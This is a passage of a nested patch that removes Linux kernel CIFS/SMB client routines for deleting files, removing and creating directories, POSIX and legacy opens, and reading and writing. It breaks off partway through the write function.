+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
+-
+-	if (rc == -EAGAIN)
+-		goto PsxDelete;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	       struct cifs_sb_info *cifs_sb)
+-{
+-	DELETE_FILE_REQ *pSMB = NULL;
+-	DELETE_FILE_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	int remap = cifs_remap(cifs_sb);
+-
+-DelFileRetry:
+-	rc = smb_init(SMB_COM_DELETE, 1, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->fileName, name,
+-					      PATH_MAX, cifs_sb->local_nls,
+-					      remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->fileName, name);
+-	}
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM);
+-	pSMB->BufferFormat = 0x04;
+-	inc_rfc1001_len(pSMB, name_len + 1);
+-	pSMB->ByteCount = cpu_to_le16(name_len + 1);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
+-	if (rc)
+-		cifs_dbg(FYI, "Error in RMFile = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto DelFileRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	     struct cifs_sb_info *cifs_sb)
+-{
+-	DELETE_DIRECTORY_REQ *pSMB = NULL;
+-	DELETE_DIRECTORY_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSSMBRmDir\n");
+-RmDirRetry:
+-	rc = smb_init(SMB_COM_DELETE_DIRECTORY, 0, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
+-					      PATH_MAX, cifs_sb->local_nls,
+-					      remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->DirName, name);
+-	}
+-
+-	pSMB->BufferFormat = 0x04;
+-	inc_rfc1001_len(pSMB, name_len + 1);
+-	pSMB->ByteCount = cpu_to_le16(name_len + 1);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_rmdirs);
+-	if (rc)
+-		cifs_dbg(FYI, "Error in RMDir = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto RmDirRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSSMBMkDir(const unsigned int xid, struct inode *inode, umode_t mode,
+-	     struct cifs_tcon *tcon, const char *name,
+-	     struct cifs_sb_info *cifs_sb)
+-{
+-	int rc = 0;
+-	CREATE_DIRECTORY_REQ *pSMB = NULL;
+-	CREATE_DIRECTORY_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSSMBMkDir\n");
+-MkDirRetry:
+-	rc = smb_init(SMB_COM_CREATE_DIRECTORY, 0, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
+-					      PATH_MAX, cifs_sb->local_nls,
+-					      remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->DirName, name);
+-	}
+-
+-	pSMB->BufferFormat = 0x04;
+-	inc_rfc1001_len(pSMB, name_len + 1);
+-	pSMB->ByteCount = cpu_to_le16(name_len + 1);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_mkdirs);
+-	if (rc)
+-		cifs_dbg(FYI, "Error in Mkdir = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto MkDirRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
+-		__u32 posix_flags, __u64 mode, __u16 *netfid,
+-		FILE_UNIX_BASIC_INFO *pRetData, __u32 *pOplock,
+-		const char *name, const struct nls_table *nls_codepage,
+-		int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-	OPEN_PSX_REQ *pdata;
+-	OPEN_PSX_RSP *psx_rsp;
+-
+-	cifs_dbg(FYI, "In POSIX Create\n");
+-PsxCreat:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, name,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, name);
+-	}
+-
+-	params = 6 + name_len;
+-	count = sizeof(OPEN_PSX_REQ);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000);	/* large enough */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	pdata = (OPEN_PSX_REQ *)((char *)(pSMB) + offset + 4);
+-	pdata->Level = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
+-	pdata->Permissions = cpu_to_le64(mode);
+-	pdata->PosixOpenFlags = cpu_to_le32(posix_flags);
+-	pdata->OpenFlags =  cpu_to_le32(*pOplock);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_OPEN);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Posix create returned %d\n", rc);
+-		goto psx_create_err;
+-	}
+-
+-	cifs_dbg(FYI, "copying inode info\n");
+-	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-	if (rc || get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)) {
+-		rc = -EIO;	/* bad smb */
+-		goto psx_create_err;
+-	}
+-
+-	/* copy return information to pRetData */
+-	psx_rsp = (OPEN_PSX_RSP *)((char *) &pSMBr->hdr.Protocol
+-			+ le16_to_cpu(pSMBr->t2.DataOffset));
+-
+-	*pOplock = le16_to_cpu(psx_rsp->OplockFlags);
+-	if (netfid)
+-		*netfid = psx_rsp->Fid;   /* cifs fid stays in le */
+-	/* Let caller know file was created so we can set the mode. */
+-	/* Do we care about the CreateAction in any other cases? */
+-	if (cpu_to_le32(FILE_CREATE) == psx_rsp->CreateAction)
+-		*pOplock |= CIFS_CREATE_ACTION;
+-	/* check to make sure response data is there */
+-	if (psx_rsp->ReturnedLevel != cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC)) {
+-		pRetData->Type = cpu_to_le32(-1); /* unknown */
+-		cifs_dbg(NOISY, "unknown type\n");
+-	} else {
+-		if (get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)
+-					+ sizeof(FILE_UNIX_BASIC_INFO)) {
+-			cifs_dbg(VFS, "Open response data too small\n");
+-			pRetData->Type = cpu_to_le32(-1);
+-			goto psx_create_err;
+-		}
+-		memcpy((char *) pRetData,
+-			(char *)psx_rsp + sizeof(OPEN_PSX_RSP),
+-			sizeof(FILE_UNIX_BASIC_INFO));
+-	}
+-
+-psx_create_err:
+-	cifs_buf_release(pSMB);
+-
+-	if (posix_flags & SMB_O_DIRECTORY)
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixmkdirs);
+-	else
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixopens);
+-
+-	if (rc == -EAGAIN)
+-		goto PsxCreat;
+-
+-	return rc;
+-}
+-
+-static __u16 convert_disposition(int disposition)
+-{
+-	__u16 ofun = 0;
+-
+-	switch (disposition) {
+-		case FILE_SUPERSEDE:
+-			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
+-			break;
+-		case FILE_OPEN:
+-			ofun = SMBOPEN_OAPPEND;
+-			break;
+-		case FILE_CREATE:
+-			ofun = SMBOPEN_OCREATE;
+-			break;
+-		case FILE_OPEN_IF:
+-			ofun = SMBOPEN_OCREATE | SMBOPEN_OAPPEND;
+-			break;
+-		case FILE_OVERWRITE:
+-			ofun = SMBOPEN_OTRUNC;
+-			break;
+-		case FILE_OVERWRITE_IF:
+-			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
+-			break;
+-		default:
+-			cifs_dbg(FYI, "unknown disposition %d\n", disposition);
+-			ofun =  SMBOPEN_OAPPEND; /* regular open */
+-	}
+-	return ofun;
+-}
+-
+-static int
+-access_flags_to_smbopen_mode(const int access_flags)
+-{
+-	int masked_flags = access_flags & (GENERIC_READ | GENERIC_WRITE);
+-
+-	if (masked_flags == GENERIC_READ)
+-		return SMBOPEN_READ;
+-	else if (masked_flags == GENERIC_WRITE)
+-		return SMBOPEN_WRITE;
+-
+-	/* just go for read/write */
+-	return SMBOPEN_READWRITE;
+-}
+-
+-int
+-SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const char *fileName, const int openDisposition,
+-	    const int access_flags, const int create_options, __u16 *netfid,
+-	    int *pOplock, FILE_ALL_INFO *pfile_info,
+-	    const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc;
+-	OPENX_REQ *pSMB = NULL;
+-	OPENX_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 count;
+-
+-OldOpenRetry:
+-	rc = smb_init(SMB_COM_OPEN_ANDX, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->AndXCommand = 0xFF;       /* none */
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		count = 1;      /* account for one byte pad to word boundary */
+-		name_len =
+-		   cifsConvertToUTF16((__le16 *) (pSMB->fileName + 1),
+-				      fileName, PATH_MAX, nls_codepage, remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		count = 0;      /* no pad */
+-		name_len = copy_path_name(pSMB->fileName, fileName);
+-	}
+-	if (*pOplock & REQ_OPLOCK)
+-		pSMB->OpenFlags = cpu_to_le16(REQ_OPLOCK);
+-	else if (*pOplock & REQ_BATCHOPLOCK)
+-		pSMB->OpenFlags = cpu_to_le16(REQ_BATCHOPLOCK);
+-
+-	pSMB->OpenFlags |= cpu_to_le16(REQ_MORE_INFO);
+-	pSMB->Mode = cpu_to_le16(access_flags_to_smbopen_mode(access_flags));
+-	pSMB->Mode |= cpu_to_le16(0x40); /* deny none */
+-	/* set file as system file if special file such
+-	   as fifo and server expecting SFU style and
+-	   no Unix extensions */
+-
+-	if (create_options & CREATE_OPTION_SPECIAL)
+-		pSMB->FileAttributes = cpu_to_le16(ATTR_SYSTEM);
+-	else /* BB FIXME BB */
+-		pSMB->FileAttributes = cpu_to_le16(0/*ATTR_NORMAL*/);
+-
+-	if (create_options & CREATE_OPTION_READONLY)
+-		pSMB->FileAttributes |= cpu_to_le16(ATTR_READONLY);
+-
+-	/* BB FIXME BB */
+-/*	pSMB->CreateOptions = cpu_to_le32(create_options &
+-						 CREATE_OPTIONS_MASK); */
+-	/* BB FIXME END BB */
+-
+-	pSMB->Sattr = cpu_to_le16(ATTR_HIDDEN | ATTR_SYSTEM | ATTR_DIRECTORY);
+-	pSMB->OpenFunction = cpu_to_le16(convert_disposition(openDisposition));
+-	count += name_len;
+-	inc_rfc1001_len(pSMB, count);
+-
+-	pSMB->ByteCount = cpu_to_le16(count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *)pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
+-	if (rc) {
+-		cifs_dbg(FYI, "Error in Open = %d\n", rc);
+-	} else {
+-	/* BB verify if wct == 15 */
+-
+-/*		*pOplock = pSMBr->OplockLevel; */ /* BB take from action field*/
+-
+-		*netfid = pSMBr->Fid;   /* cifs fid stays in le */
+-		/* Let caller know file was created so we can set the mode. */
+-		/* Do we care about the CreateAction in any other cases? */
+-	/* BB FIXME BB */
+-/*		if (cpu_to_le32(FILE_CREATE) == pSMBr->CreateAction)
+-			*pOplock |= CIFS_CREATE_ACTION; */
+-	/* BB FIXME END */
+-
+-		if (pfile_info) {
+-			pfile_info->CreationTime = 0; /* BB convert CreateTime*/
+-			pfile_info->LastAccessTime = 0; /* BB fixme */
+-			pfile_info->LastWriteTime = 0; /* BB fixme */
+-			pfile_info->ChangeTime = 0;  /* BB fixme */
+-			pfile_info->Attributes =
+-				cpu_to_le32(le16_to_cpu(pSMBr->FileAttributes));
+-			/* the file_info buf is endian converted by caller */
+-			pfile_info->AllocationSize =
+-				cpu_to_le64(le32_to_cpu(pSMBr->EndOfFile));
+-			pfile_info->EndOfFile = pfile_info->AllocationSize;
+-			pfile_info->NumberOfLinks = cpu_to_le32(1);
+-			pfile_info->DeletePending = 0;
+-		}
+-	}
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto OldOpenRetry;
+-	return rc;
+-}
+-
+-int
+-CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms, int *oplock,
+-	  FILE_ALL_INFO *buf)
+-{
+-	int rc;
+-	OPEN_REQ *req = NULL;
+-	OPEN_RSP *rsp = NULL;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 count;
+-	struct cifs_sb_info *cifs_sb = oparms->cifs_sb;
+-	struct cifs_tcon *tcon = oparms->tcon;
+-	int remap = cifs_remap(cifs_sb);
+-	const struct nls_table *nls = cifs_sb->local_nls;
+-	int create_options = oparms->create_options;
+-	int desired_access = oparms->desired_access;
+-	int disposition = oparms->disposition;
+-	const char *path = oparms->path;
+-
+-openRetry:
+-	rc = smb_init(SMB_COM_NT_CREATE_ANDX, 24, tcon, (void **)&req,
+-		      (void **)&rsp);
+-	if (rc)
+-		return rc;
+-
+-	/* no commands go after this */
+-	req->AndXCommand = 0xFF;
+-
+-	if (req->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		/* account for one byte pad to word boundary */
+-		count = 1;
+-		name_len = cifsConvertToUTF16((__le16 *)(req->fileName + 1),
+-					      path, PATH_MAX, nls, remap);
+-		/* trailing null */
+-		name_len++;
+-		name_len *= 2;
+-		req->NameLength = cpu_to_le16(name_len);
+-	} else {
+-		/* BB improve check for buffer overruns BB */
+-		/* no pad */
+-		count = 0;
+-		name_len = copy_path_name(req->fileName, path);
+-		req->NameLength = cpu_to_le16(name_len);
+-	}
+-
+-	if (*oplock & REQ_OPLOCK)
+-		req->OpenFlags = cpu_to_le32(REQ_OPLOCK);
+-	else if (*oplock & REQ_BATCHOPLOCK)
+-		req->OpenFlags = cpu_to_le32(REQ_BATCHOPLOCK);
+-
+-	req->DesiredAccess = cpu_to_le32(desired_access);
+-	req->AllocationSize = 0;
+-
+-	/*
+-	 * Set file as system file if special file such as fifo and server
+-	 * expecting SFU style and no Unix extensions.
+-	 */
+-	if (create_options & CREATE_OPTION_SPECIAL)
+-		req->FileAttributes = cpu_to_le32(ATTR_SYSTEM);
+-	else
+-		req->FileAttributes = cpu_to_le32(ATTR_NORMAL);
+-
+-	/*
+-	 * XP does not handle ATTR_POSIX_SEMANTICS but it helps speed up case
+-	 * sensitive checks for other servers such as Samba.
+-	 */
+-	if (tcon->ses->capabilities & CAP_UNIX)
+-		req->FileAttributes |= cpu_to_le32(ATTR_POSIX_SEMANTICS);
+-
+-	if (create_options & CREATE_OPTION_READONLY)
+-		req->FileAttributes |= cpu_to_le32(ATTR_READONLY);
+-
+-	req->ShareAccess = cpu_to_le32(FILE_SHARE_ALL);
+-	req->CreateDisposition = cpu_to_le32(disposition);
+-	req->CreateOptions = cpu_to_le32(create_options & CREATE_OPTIONS_MASK);
+-
+-	/* BB Expirement with various impersonation levels and verify */
+-	req->ImpersonationLevel = cpu_to_le32(SECURITY_IMPERSONATION);
+-	req->SecurityFlags = SECURITY_CONTEXT_TRACKING|SECURITY_EFFECTIVE_ONLY;
+-
+-	count += name_len;
+-	inc_rfc1001_len(req, count);
+-
+-	req->ByteCount = cpu_to_le16(count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *)req,
+-			 (struct smb_hdr *)rsp, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
+-	if (rc) {
+-		cifs_dbg(FYI, "Error in Open = %d\n", rc);
+-		cifs_buf_release(req);
+-		if (rc == -EAGAIN)
+-			goto openRetry;
+-		return rc;
+-	}
+-
+-	/* 1 byte no need to le_to_cpu */
+-	*oplock = rsp->OplockLevel;
+-	/* cifs fid stays in le */
+-	oparms->fid->netfid = rsp->Fid;
+-	oparms->fid->access = desired_access;
+-
+-	/* Let caller know file was created so we can set the mode. */
+-	/* Do we care about the CreateAction in any other cases? */
+-	if (cpu_to_le32(FILE_CREATE) == rsp->CreateAction)
+-		*oplock |= CIFS_CREATE_ACTION;
+-
+-	if (buf) {
+-		/* copy from CreationTime to Attributes */
+-		memcpy((char *)buf, (char *)&rsp->CreationTime, 36);
+-		/* the file_info buf is endian converted by caller */
+-		buf->AllocationSize = rsp->AllocationSize;
+-		buf->EndOfFile = rsp->EndOfFile;
+-		buf->NumberOfLinks = cpu_to_le32(1);
+-		buf->DeletePending = 0;
+-	}
+-
+-	cifs_buf_release(req);
+-	return rc;
+-}
+-
+-static void
+-cifs_readv_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct smb_rqst rqst = { .rq_iov = rdata->iov,
+-				 .rq_nvec = 2,
+-				 .rq_pages = rdata->pages,
+-				 .rq_offset = rdata->page_offset,
+-				 .rq_npages = rdata->nr_pages,
+-				 .rq_pagesz = rdata->pagesz,
+-				 .rq_tailsz = rdata->tailsz };
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-
+-	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
+-		 __func__, mid->mid, mid->mid_state, rdata->result,
+-		 rdata->bytes);
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		/* result already set, check signature */
+-		if (server->sign) {
+-			int rc = 0;
+-
+-			rc = cifs_verify_signature(&rqst, server,
+-						  mid->sequence_number);
+-			if (rc)
+-				cifs_dbg(VFS, "SMB signature verification returned error = %d\n",
+-					 rc);
+-		}
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		rdata->result = -EAGAIN;
+-		if (server->sign && rdata->got_bytes)
+-			/* reset bytes number since we can not check a sign */
+-			rdata->got_bytes = 0;
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	default:
+-		rdata->result = -EIO;
+-	}
+-
+-	queue_work(cifsiod_wq, &rdata->work);
+-	release_mid(mid);
+-	add_credits(server, &credits, 0);
+-}
+-
+-/* cifs_async_readv - send an async write, and set up mid to handle result */
+-int
+-cifs_async_readv(struct cifs_readdata *rdata)
+-{
+-	int rc;
+-	READ_REQ *smb = NULL;
+-	int wct;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	struct smb_rqst rqst = { .rq_iov = rdata->iov,
+-				 .rq_nvec = 2 };
+-
+-	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
+-		 __func__, rdata->offset, rdata->bytes);
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES)
+-		wct = 12;
+-	else {
+-		wct = 10; /* old style read */
+-		if ((rdata->offset >> 32) > 0)  {
+-			/* can not handle this big offset for old */
+-			return -EIO;
+-		}
+-	}
+-
+-	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **)&smb);
+-	if (rc)
+-		return rc;
+-
+-	smb->hdr.Pid = cpu_to_le16((__u16)rdata->pid);
+-	smb->hdr.PidHigh = cpu_to_le16((__u16)(rdata->pid >> 16));
+-
+-	smb->AndXCommand = 0xFF;	/* none */
+-	smb->Fid = rdata->cfile->fid.netfid;
+-	smb->OffsetLow = cpu_to_le32(rdata->offset & 0xFFFFFFFF);
+-	if (wct == 12)
+-		smb->OffsetHigh = cpu_to_le32(rdata->offset >> 32);
+-	smb->Remaining = 0;
+-	smb->MaxCount = cpu_to_le16(rdata->bytes & 0xFFFF);
+-	smb->MaxCountHigh = cpu_to_le32(rdata->bytes >> 16);
+-	if (wct == 12)
+-		smb->ByteCount = 0;
+-	else {
+-		/* old style read */
+-		struct smb_com_readx_req *smbr =
+-			(struct smb_com_readx_req *)smb;
+-		smbr->ByteCount = 0;
+-	}
+-
+-	/* 4 for RFC1001 length + 1 for BCC */
+-	rdata->iov[0].iov_base = smb;
+-	rdata->iov[0].iov_len = 4;
+-	rdata->iov[1].iov_base = (char *)smb + 4;
+-	rdata->iov[1].iov_len = get_rfc1002_length(smb);
+-
+-	kref_get(&rdata->refcount);
+-	rc = cifs_call_async(tcon->ses->server, &rqst, cifs_readv_receive,
+-			     cifs_readv_callback, NULL, rdata, 0, NULL);
+-
+-	if (rc == 0)
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
+-	else
+-		kref_put(&rdata->refcount, cifs_readdata_release);
+-
+-	cifs_small_buf_release(smb);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	    unsigned int *nbytes, char **buf, int *pbuf_type)
+-{
+-	int rc = -EACCES;
+-	READ_REQ *pSMB = NULL;
+-	READ_RSP *pSMBr = NULL;
+-	char *pReadData = NULL;
+-	int wct;
+-	int resp_buf_type = 0;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	__u32 pid = io_parms->pid;
+-	__u16 netfid = io_parms->netfid;
+-	__u64 offset = io_parms->offset;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-	unsigned int count = io_parms->length;
+-
+-	cifs_dbg(FYI, "Reading %d bytes on fid %d\n", count, netfid);
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES)
+-		wct = 12;
+-	else {
+-		wct = 10; /* old style read */
+-		if ((offset >> 32) > 0)  {
+-			/* can not handle this big offset for old */
+-			return -EIO;
+-		}
+-	}
+-
+-	*nbytes = 0;
+-	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
+-
+-	/* tcon and ses pointer are checked in smb_init */
+-	if (tcon->ses->server == NULL)
+-		return -ECONNABORTED;
+-
+-	pSMB->AndXCommand = 0xFF;       /* none */
+-	pSMB->Fid = netfid;
+-	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
+-	if (wct == 12)
+-		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
+-
+-	pSMB->Remaining = 0;
+-	pSMB->MaxCount = cpu_to_le16(count & 0xFFFF);
+-	pSMB->MaxCountHigh = cpu_to_le32(count >> 16);
+-	if (wct == 12)
+-		pSMB->ByteCount = 0;  /* no need to do le conversion since 0 */
+-	else {
+-		/* old style read */
+-		struct smb_com_readx_req *pSMBW =
+-			(struct smb_com_readx_req *)pSMB;
+-		pSMBW->ByteCount = 0;
+-	}
+-
+-	iov[0].iov_base = (char *)pSMB;
+-	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
+-	rc = SendReceive2(xid, tcon->ses, iov, 1, &resp_buf_type,
+-			  CIFS_LOG_ERROR, &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
+-	pSMBr = (READ_RSP *)rsp_iov.iov_base;
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in read = %d\n", rc);
+-	} else {
+-		int data_length = le16_to_cpu(pSMBr->DataLengthHigh);
+-		data_length = data_length << 16;
+-		data_length += le16_to_cpu(pSMBr->DataLength);
+-		*nbytes = data_length;
+-
+-		/*check that DataLength would not go beyond end of SMB */
+-		if ((data_length > CIFSMaxBufSize)
+-				|| (data_length > count)) {
+-			cifs_dbg(FYI, "bad length %d for count %d\n",
+-				 data_length, count);
+-			rc = -EIO;
+-			*nbytes = 0;
+-		} else {
+-			pReadData = (char *) (&pSMBr->hdr.Protocol) +
+-					le16_to_cpu(pSMBr->DataOffset);
+-/*			if (rc = copy_to_user(buf, pReadData, data_length)) {
+-				cifs_dbg(VFS, "Faulting on read rc = %d\n",rc);
+-				rc = -EFAULT;
+-			}*/ /* can not use copy_to_user when using page cache*/
+-			if (*buf)
+-				memcpy(*buf, pReadData, data_length);
+-		}
+-	}
+-
+-	if (*buf) {
+-		free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
+-	} else if (resp_buf_type != CIFS_NO_BUFFER) {
+-		/* return buffer to caller to free */
+-		*buf = rsp_iov.iov_base;
+-		if (resp_buf_type == CIFS_SMALL_BUFFER)
+-			*pbuf_type = CIFS_SMALL_BUFFER;
+-		else if (resp_buf_type == CIFS_LARGE_BUFFER)
+-			*pbuf_type = CIFS_LARGE_BUFFER;
+-	} /* else no valid buffer on return - leave as null */
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-	return rc;
+-}
+-
+-
+-int
+-CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	     unsigned int *nbytes, const char *buf)
+-{
+-	int rc = -EACCES;
+-	WRITE_REQ *pSMB = NULL;
+-	WRITE_RSP *pSMBr = NULL;
+-	int bytes_returned, wct;
+-	__u32 bytes_sent;
+-	__u16 byte_count;
+-	__u32 pid = io_parms->pid;
+-	__u16 netfid = io_parms->netfid;
+-	__u64 offset = io_parms->offset;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-	unsigned int count = io_parms->length;
+-
+-	*nbytes = 0;
+-
+-	/* cifs_dbg(FYI, "write at %lld %d bytes\n", offset, count);*/
+-	if (tcon->ses == NULL)
+-		return -ECONNABORTED;
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES)
+-		wct = 14;
+-	else {
+-		wct = 12;
+-		if ((offset >> 32) > 0) {
+-			/* can not handle big offset for old srv */
+-			return -EIO;
+-		}
+-	}
+-
+-	rc = smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
+-
+-	/* tcon and ses pointer are checked in smb_init */
+-	if (tcon->ses->server == NULL)
+-		return -ECONNABORTED;
+-
+-	pSMB->AndXCommand = 0xFF;	/* none */
+-	pSMB->Fid = netfid;
+-	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
+-	if (wct == 14)
